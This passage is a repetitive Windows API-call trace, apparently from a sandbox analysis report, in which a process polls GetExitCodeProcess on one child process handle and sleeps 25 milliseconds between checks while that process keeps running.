(dwMilliseconds=0x19) [0197.899] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.899] Sleep (dwMilliseconds=0x19) [0197.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.936] Sleep (dwMilliseconds=0x19) [0197.983] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.983] Sleep (dwMilliseconds=0x19) [0198.030] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.030] Sleep (dwMilliseconds=0x19) [0198.068] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.068] Sleep (dwMilliseconds=0x19) [0198.098] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.098] Sleep (dwMilliseconds=0x19) [0198.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.205] Sleep (dwMilliseconds=0x19) [0198.241] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.241] Sleep (dwMilliseconds=0x19) [0198.278] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.278] Sleep (dwMilliseconds=0x19) [0198.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.321] Sleep (dwMilliseconds=0x19) [0198.359] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.359] Sleep (dwMilliseconds=0x19) [0198.402] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.402] Sleep (dwMilliseconds=0x19) [0198.460] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.460] Sleep (dwMilliseconds=0x19) [0198.540] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.540] Sleep (dwMilliseconds=0x19) [0198.585] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.585] Sleep (dwMilliseconds=0x19) [0198.639] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.639] Sleep (dwMilliseconds=0x19) [0198.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.685] Sleep (dwMilliseconds=0x19) [0198.725] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.725] Sleep (dwMilliseconds=0x19) [0198.757] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.757] Sleep (dwMilliseconds=0x19) [0198.797] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.797] Sleep (dwMilliseconds=0x19) [0198.837] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.837] Sleep (dwMilliseconds=0x19) [0198.899] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.899] Sleep (dwMilliseconds=0x19) [0198.959] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0198.959] Sleep (dwMilliseconds=0x19) [0199.062] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.062] Sleep (dwMilliseconds=0x19) [0199.278] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.278] Sleep (dwMilliseconds=0x19) [0199.363] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.364] Sleep (dwMilliseconds=0x19) [0199.470] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.470] Sleep (dwMilliseconds=0x19) [0199.533] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.534] Sleep (dwMilliseconds=0x19) [0199.573] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.573] Sleep (dwMilliseconds=0x19) [0199.612] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.613] Sleep (dwMilliseconds=0x19) [0199.659] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.660] Sleep (dwMilliseconds=0x19) [0199.749] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.749] Sleep (dwMilliseconds=0x19) [0199.795] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.795] Sleep (dwMilliseconds=0x19) [0199.842] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.842] Sleep (dwMilliseconds=0x19) [0199.916] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.916] Sleep (dwMilliseconds=0x19) [0199.990] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0199.990] Sleep (dwMilliseconds=0x19) [0200.068] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.068] Sleep (dwMilliseconds=0x19) [0200.217] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.218] Sleep (dwMilliseconds=0x19) [0200.289] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.290] Sleep (dwMilliseconds=0x19) [0200.373] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.373] Sleep (dwMilliseconds=0x19) [0200.446] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.446] Sleep (dwMilliseconds=0x19) [0200.518] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.518] Sleep (dwMilliseconds=0x19) [0200.589] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.589] Sleep (dwMilliseconds=0x19) [0200.660] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.660] Sleep (dwMilliseconds=0x19) [0200.713] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.713] Sleep (dwMilliseconds=0x19) [0200.752] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.752] Sleep (dwMilliseconds=0x19) [0200.788] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.788] Sleep (dwMilliseconds=0x19) [0200.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.829] Sleep (dwMilliseconds=0x19) [0200.886] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.886] Sleep (dwMilliseconds=0x19) [0200.940] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.940] Sleep (dwMilliseconds=0x19) [0200.977] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0200.977] Sleep (dwMilliseconds=0x19) [0201.043] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.044] Sleep (dwMilliseconds=0x19) [0201.113] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.114] Sleep (dwMilliseconds=0x19) [0201.254] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.254] Sleep (dwMilliseconds=0x19) [0201.312] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.312] Sleep (dwMilliseconds=0x19) [0201.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.382] Sleep (dwMilliseconds=0x19) [0201.459] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.459] Sleep (dwMilliseconds=0x19) [0201.516] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.516] Sleep (dwMilliseconds=0x19) [0201.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.554] Sleep (dwMilliseconds=0x19) [0201.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.630] Sleep (dwMilliseconds=0x19) [0201.671] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.671] Sleep (dwMilliseconds=0x19) [0201.732] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.732] Sleep (dwMilliseconds=0x19) [0201.769] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.770] Sleep (dwMilliseconds=0x19) [0201.809] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0201.810] Sleep (dwMilliseconds=0x19) [0202.004] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.004] Sleep (dwMilliseconds=0x19) [0202.242] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.242] Sleep (dwMilliseconds=0x19) [0202.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.284] Sleep (dwMilliseconds=0x19) [0202.324] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.324] Sleep (dwMilliseconds=0x19) [0202.385] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.385] Sleep (dwMilliseconds=0x19) [0202.452] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.452] Sleep (dwMilliseconds=0x19) [0202.500] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.500] Sleep (dwMilliseconds=0x19) [0202.528] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.528] Sleep (dwMilliseconds=0x19) [0202.578] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.578] Sleep (dwMilliseconds=0x19) [0202.605] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.605] Sleep (dwMilliseconds=0x19) [0202.630] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.630] Sleep (dwMilliseconds=0x19) [0202.658] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.658] Sleep (dwMilliseconds=0x19) [0202.689] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.689] Sleep (dwMilliseconds=0x19) [0202.714] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.714] Sleep (dwMilliseconds=0x19) [0202.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.741] Sleep (dwMilliseconds=0x19) [0202.772] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.772] Sleep (dwMilliseconds=0x19) [0202.798] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.799] Sleep (dwMilliseconds=0x19) [0202.826] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.827] Sleep (dwMilliseconds=0x19) [0202.853] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.853] Sleep (dwMilliseconds=0x19) [0202.886] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.886] Sleep (dwMilliseconds=0x19) [0202.913] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.914] Sleep (dwMilliseconds=0x19) [0202.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.940] Sleep (dwMilliseconds=0x19) [0202.975] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0202.975] Sleep (dwMilliseconds=0x19) [0203.005] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.005] Sleep (dwMilliseconds=0x19) [0203.040] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.040] Sleep (dwMilliseconds=0x19) [0203.073] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.074] Sleep (dwMilliseconds=0x19) [0203.110] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.110] Sleep (dwMilliseconds=0x19) [0203.183] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.183] Sleep (dwMilliseconds=0x19) [0203.210] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.210] Sleep (dwMilliseconds=0x19) [0203.271] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.271] Sleep (dwMilliseconds=0x19) [0203.298] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0203.299] Sleep (dwMilliseconds=0x19) [0204.987] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0204.987] Sleep (dwMilliseconds=0x19) [0205.062] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0205.062] Sleep (dwMilliseconds=0x19) [0205.140] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0205.140] Sleep (dwMilliseconds=0x19) [0205.233] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0205.233] Sleep (dwMilliseconds=0x19) [0205.349] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0205.349] Sleep (dwMilliseconds=0x19) [0205.876] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0205.876] Sleep (dwMilliseconds=0x19) [0205.956] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0205.957] Sleep (dwMilliseconds=0x19) [0206.044] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.044] Sleep (dwMilliseconds=0x19) [0206.116] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.117] Sleep (dwMilliseconds=0x19) [0206.169] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.169] Sleep (dwMilliseconds=0x19) [0206.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.212] Sleep (dwMilliseconds=0x19) [0206.251] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.252] Sleep (dwMilliseconds=0x19) [0206.296] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.519] Sleep (dwMilliseconds=0x19) [0206.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.576] Sleep (dwMilliseconds=0x19) [0206.603] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.603] Sleep (dwMilliseconds=0x19) [0206.635] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.635] Sleep (dwMilliseconds=0x19) [0206.668] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.668] Sleep (dwMilliseconds=0x19) [0206.729] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.729] Sleep (dwMilliseconds=0x19) [0206.782] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.782] Sleep (dwMilliseconds=0x19) [0206.850] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.851] Sleep (dwMilliseconds=0x19) [0206.887] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.887] Sleep (dwMilliseconds=0x19) [0206.925] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.926] Sleep (dwMilliseconds=0x19) [0206.955] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.955] Sleep (dwMilliseconds=0x19) [0206.990] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0206.991] Sleep (dwMilliseconds=0x19) [0207.019] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.019] Sleep (dwMilliseconds=0x19) [0207.045] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.045] Sleep (dwMilliseconds=0x19) [0207.080] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.080] Sleep (dwMilliseconds=0x19) [0207.148] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.148] Sleep (dwMilliseconds=0x19) [0207.344] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.345] Sleep (dwMilliseconds=0x19) [0207.465] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.465] Sleep (dwMilliseconds=0x19) [0207.541] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.541] Sleep (dwMilliseconds=0x19) [0207.647] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.661] Sleep (dwMilliseconds=0x19) [0207.712] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.713] Sleep (dwMilliseconds=0x19) [0207.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.823] Sleep (dwMilliseconds=0x19) [0207.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0207.945] Sleep (dwMilliseconds=0x19) [0208.024] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.024] Sleep (dwMilliseconds=0x19) [0208.154] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.154] Sleep (dwMilliseconds=0x19) [0208.337] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.337] Sleep (dwMilliseconds=0x19) [0208.519] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.519] Sleep (dwMilliseconds=0x19) [0208.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.614] Sleep (dwMilliseconds=0x19) [0208.692] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.693] Sleep (dwMilliseconds=0x19) [0208.825] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.825] Sleep (dwMilliseconds=0x19) [0208.937] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0208.937] Sleep (dwMilliseconds=0x19) [0209.031] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.032] Sleep (dwMilliseconds=0x19) [0209.091] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.091] Sleep (dwMilliseconds=0x19) [0209.140] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.140] Sleep (dwMilliseconds=0x19) [0209.283] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.283] Sleep (dwMilliseconds=0x19) [0209.423] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.423] Sleep (dwMilliseconds=0x19) [0209.517] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.518] Sleep (dwMilliseconds=0x19) [0209.720] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.720] Sleep (dwMilliseconds=0x19) [0209.794] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.794] Sleep (dwMilliseconds=0x19) [0209.912] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0209.913] Sleep (dwMilliseconds=0x19) [0210.021] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.021] Sleep (dwMilliseconds=0x19) [0210.120] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.120] Sleep (dwMilliseconds=0x19) [0210.280] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.281] Sleep (dwMilliseconds=0x19) [0210.415] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.415] Sleep (dwMilliseconds=0x19) [0210.507] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.508] Sleep (dwMilliseconds=0x19) [0210.586] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.586] Sleep (dwMilliseconds=0x19) [0210.661] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.661] Sleep (dwMilliseconds=0x19) [0210.731] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.731] Sleep (dwMilliseconds=0x19) [0210.801] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.801] Sleep (dwMilliseconds=0x19) [0210.890] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.890] Sleep (dwMilliseconds=0x19) [0210.968] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0210.968] Sleep (dwMilliseconds=0x19) [0211.041] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.041] Sleep (dwMilliseconds=0x19) [0211.111] GetExitCodeProcess (in: hProcess=0x40c, 